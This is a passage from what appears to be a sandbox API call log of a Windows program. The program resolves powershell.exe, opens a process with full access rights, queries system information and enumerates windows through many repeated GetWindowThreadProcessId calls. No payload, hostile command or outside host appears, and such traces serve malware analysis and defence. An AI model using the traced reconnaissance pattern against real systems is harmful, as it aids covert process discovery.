lpmodinfo=0x2a47a0c*(lpBaseOfDll=0x226b0000, SizeOfImage=0x72000, EntryPoint=0x226b7363)) returned 1 [0071.673] GetLastError () returned 0x0 [0071.676] GetModuleBaseNameW (in: hProcess=0x310, hModule=0x226b0000, lpBaseName=0x55d940, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0071.677] GetLastError () returned 0x0 [0071.678] GetModuleFileNameExW (in: hProcess=0x310, hModule=0x226b0000, lpFilename=0x55d940, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0071.678] GetLastError () returned 0x0 [0071.679] CloseHandle (hObject=0x310) returned 1 [0071.679] GetLastError () returned 0x0 [0071.683] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x688) returned 0x310 [0071.683] GetLastError () returned 0x0 [0071.685] GetExitCodeProcess (in: hProcess=0x310, lpExitCode=0x2a46ebc | out: lpExitCode=0x2a46ebc*=0x103) returned 1 [0071.686] GetLastError () returned 0x0 [0071.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3a45278, Length=0x20000, ResultLength=0xae74c | out: SystemInformation=0x3a45278, ResultLength=0xae74c*=0xdd78) returned 0x0 [0071.726] EnumWindows (lpEnumFunc=0x2903612, lParam=0x0) returned 1 [0071.729] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x538 [0071.729] GetLastError () returned 0x0 [0071.730] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.730] GetLastError () returned 0x0 [0071.730] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.730] GetLastError () returned 0x0 [0071.730] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.730] GetLastError () returned 0x0 [0071.730] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x514 [0071.730] GetLastError () returned 0x0 [0071.730] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.730] GetLastError () returned 0x0 [0071.731] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x778 [0071.731] GetLastError () returned 0x0 [0071.731] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x778 [0071.731] GetLastError () returned 0x0 [0071.731] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.731] GetLastError () returned 0x0 [0071.731] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.731] GetLastError () returned 0x0 [0071.731] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.731] GetLastError () returned 0x0 [0071.732] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.732] GetLastError () returned 0x0 [0071.732] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.732] GetLastError () returned 0x0 [0071.732] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.732] GetLastError () returned 0x0 [0071.732] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.732] GetLastError () returned 0x0 [0071.732] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.732] GetLastError () returned 0x0 [0071.733] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.733] GetLastError () returned 0x0 [0071.733] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x458 [0071.733] GetLastError () returned 0x0 [0071.734] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.734] GetLastError () returned 0x0 [0071.734] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.734] GetLastError () returned 0x0 [0071.735] GetWindowThreadProcessId (in: hWnd=0x1026e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0xa30 [0071.735] GetLastError () returned 0x0 [0071.735] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.735] GetLastError () returned 0x0 [0071.735] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.735] GetLastError () returned 0x0 [0071.735] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.735] GetLastError () returned 0x0 [0071.735] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.735] GetLastError () returned 0x0 [0071.735] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.735] GetLastError () returned 0x0 [0071.736] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.736] GetLastError () returned 0x0 [0071.736] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.736] GetLastError () returned 0x0 [0071.736] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.736] GetLastError () returned 0x0 [0071.736] GetWindowThreadProcessId (in: hWnd=0x1026a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0xa20 [0071.736] GetLastError () returned 0x0 [0071.736] GetWindowThreadProcessId (in: hWnd=0x10266, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0xa10 [0071.736] GetLastError () returned 0x0 [0071.737] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0xa00 [0071.737] GetLastError () returned 0x0 [0071.737] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9f0 [0071.737] GetLastError () returned 0x0 [0071.737] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9e0 [0071.737] GetLastError () returned 0x0 [0071.737] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9d0 [0071.737] GetLastError () returned 0x0 [0071.737] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9c0 [0071.738] GetLastError () returned 0x0 [0071.738] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9b0 [0071.738] GetLastError () returned 0x0 [0071.738] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9a0 [0071.738] GetLastError () returned 0x0 [0071.738] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x990 [0071.738] GetLastError () returned 0x0 [0071.738] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x980 [0071.738] GetLastError () returned 0x0 [0071.739] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x970 [0071.739] GetLastError () returned 0x0 [0071.739] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x960 [0071.739] GetLastError () returned 0x0 [0071.739] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x950 [0071.739] GetLastError () returned 0x0 [0071.739] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x940 [0071.739] GetLastError () returned 0x0 [0071.739] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x930 [0071.739] GetLastError () returned 0x0 [0071.740] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x920 [0071.740] GetLastError () returned 0x0 [0071.740] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x910 [0071.740] GetLastError () returned 0x0 [0071.740] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x900 [0071.740] GetLastError () returned 0x0 [0071.740] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8f0 [0071.740] GetLastError () returned 0x0 [0071.740] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8e0 [0071.741] GetLastError () returned 0x0 [0071.741] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8d0 [0071.741] GetLastError () returned 0x0 [0071.741] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8c0 [0071.741] GetLastError () returned 0x0 [0071.741] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8b0 [0071.741] GetLastError () returned 0x0 [0071.742] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8a0 [0071.742] GetLastError () returned 0x0 [0071.742] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x890 [0071.742] GetLastError () returned 0x0 [0071.742] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x880 [0071.742] GetLastError () returned 0x0 [0071.742] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x870 [0071.742] GetLastError () returned 0x0 [0071.742] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x860 [0071.743] GetLastError () returned 0x0 [0071.743] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x850 [0071.743] GetLastError () returned 0x0 [0071.743] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x840 [0071.743] GetLastError () returned 0x0 [0071.743] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x830 [0071.743] GetLastError () returned 0x0 [0071.743] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x820 [0071.743] GetLastError () returned 0x0 [0071.744] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x810 [0071.744] GetLastError () returned 0x0 [0071.744] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x734 [0071.744] GetLastError () returned 0x0 [0071.744] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x124 [0071.744] GetLastError () returned 0x0 [0071.744] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x6dc [0071.744] GetLastError () returned 0x0 [0071.744] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x5bc [0071.745] GetLastError () returned 0x0 [0071.745] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x598 [0071.745] GetLastError () returned 0x0 [0071.745] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7cc [0071.745] GetLastError () returned 0x0 [0071.745] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x620 [0071.745] GetLastError () returned 0x0 [0071.745] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x138 [0071.745] GetLastError () returned 0x0 [0071.746] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7e8 [0071.746] GetLastError () returned 0x0 [0071.746] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x694 [0071.746] GetLastError () returned 0x0 [0071.746] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x704 [0071.746] GetLastError () returned 0x0 [0071.746] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x2c4 [0071.746] GetLastError () returned 0x0 [0071.746] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x76c [0071.746] GetLastError () returned 0x0 [0071.746] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x5ac [0071.746] GetLastError () returned 0x0 [0071.746] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x544 [0071.747] GetLastError () returned 0x0 [0071.747] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7dc [0071.747] GetLastError () returned 0x0 [0071.747] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7d0 [0071.747] GetLastError () returned 0x0 [0071.747] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7f4 [0071.747] GetLastError () returned 0x0 [0071.747] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x774 [0071.747] GetLastError () returned 0x0 [0071.747] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7bc [0071.747] GetLastError () returned 0x0 [0071.747] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x40c [0071.747] GetLastError () returned 0x0 [0071.748] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x788 [0071.748] GetLastError () returned 0x0 [0071.748] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7c0 [0071.748] GetLastError () returned 0x0 [0071.748] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7a0 [0071.748] GetLastError () returned 0x0 [0071.748] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x244 [0071.748] GetLastError () returned 0x0 [0071.748] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x1c0 [0071.748] GetLastError () returned 0x0 [0071.748] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x780 [0071.748] GetLastError () returned 0x0 [0071.748] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x57c [0071.748] GetLastError () returned 0x0 [0071.748] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7b0 [0071.749] GetLastError () returned 0x0 [0071.749] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x290 [0071.749] GetLastError () returned 0x0 [0071.749] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x70c [0071.749] GetLastError () returned 0x0 [0071.749] GetWindowThreadProcessId (in: hWnd=0xa0166, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x534 [0071.749] GetLastError () returned 0x0 [0071.749] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4f0 [0071.749] GetLastError () returned 0x0 [0071.749] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x514 [0071.749] GetLastError () returned 0x0 [0071.749] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x50c [0071.749] GetLastError () returned 0x0 [0071.749] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x514 [0071.750] GetLastError () returned 0x0 [0071.750] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x50c [0071.750] GetLastError () returned 0x0 [0071.750] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x514 [0071.750] GetLastError () returned 0x0 [0071.750] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4f0 [0071.750] GetLastError () returned 0x0 [0071.750] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4f0 [0071.750] GetLastError () returned 0x0 [0071.750] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x58c [0071.750] GetLastError () returned 0x0 [0071.750] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x578 [0071.750] GetLastError () returned 0x0 [0071.750] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x458 [0071.750] GetLastError () returned 0x0 [0071.751] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x530 [0071.751] GetLastError () returned 0x0 [0071.751] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.751] GetLastError () returned 0x0 [0071.751] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x508 [0071.751] GetLastError () returned 0x0 [0071.751] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.751] GetLastError () returned 0x0 [0071.751] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4f4 [0071.751] GetLastError () returned 0x0 [0071.751] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.751] GetLastError () returned 0x0 [0071.751] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.751] GetLastError () returned 0x0 [0071.752] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x794 [0071.752] GetLastError () returned 0x0 [0071.752] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.752] GetLastError () returned 0x0 [0071.752] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.752] GetLastError () returned 0x0 [0071.752] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x458 [0071.752] GetLastError () returned 0x0 [0071.752] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x458 [0071.752] GetLastError () returned 0x0 [0071.752] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x448 [0071.752] GetLastError () returned 0x0 [0071.752] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x778 [0071.752] GetLastError () returned 0x0 [0071.752] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x458 [0071.753] GetLastError () returned 0x0 [0071.753] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x538 [0071.753] GetLastError () returned 0x0 [0071.753] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.753] GetLastError () returned 0x0 [0071.753] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4ac [0071.753] GetLastError () returned 0x0 [0071.753] GetWindowThreadProcessId (in: hWnd=0x10270, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0xa30 [0071.753] GetLastError () returned 0x0 [0071.753] GetWindowThreadProcessId (in: hWnd=0x1026c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0xa20 [0071.753] GetLastError () returned 0x0 [0071.753] GetWindowThreadProcessId (in: hWnd=0x10268, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0xa10 [0071.753] GetLastError () returned 0x0 [0071.753] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0xa00 [0071.753] GetLastError () returned 0x0 [0071.753] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9f0 [0071.754] GetLastError () returned 0x0 [0071.754] GetWindowThreadProcessId (in: hWnd=0x1025c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9e0 [0071.754] GetLastError () returned 0x0 [0071.754] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9d0 [0071.754] GetLastError () returned 0x0 [0071.754] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9c0 [0071.754] GetLastError () returned 0x0 [0071.754] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9b0 [0071.754] GetLastError () returned 0x0 [0071.754] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x9a0 [0071.754] GetLastError () returned 0x0 [0071.754] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x990 [0071.754] GetLastError () returned 0x0 [0071.754] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x980 [0071.754] GetLastError () returned 0x0 [0071.754] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x970 [0071.755] GetLastError () returned 0x0 [0071.755] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x960 [0071.755] GetLastError () returned 0x0 [0071.755] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x950 [0071.755] GetLastError () returned 0x0 [0071.755] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x940 [0071.755] GetLastError () returned 0x0 [0071.755] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x930 [0071.755] GetLastError () returned 0x0 [0071.755] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x920 [0071.755] GetLastError () returned 0x0 [0071.755] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x910 [0071.755] GetLastError () returned 0x0 [0071.755] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x900 [0071.756] GetLastError () returned 0x0 [0071.756] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8f0 [0071.756] GetLastError () returned 0x0 [0071.756] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8e0 [0071.756] GetLastError () returned 0x0 [0071.756] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8d0 [0071.756] GetLastError () returned 0x0 [0071.756] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8c0 [0071.756] GetLastError () returned 0x0 [0071.756] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8b0 [0071.756] GetLastError () returned 0x0 [0071.756] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x8a0 [0071.756] GetLastError () returned 0x0 [0071.756] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x890 [0071.756] GetLastError () returned 0x0 [0071.757] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x880 [0071.757] GetLastError () returned 0x0 [0071.757] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x870 [0071.757] GetLastError () 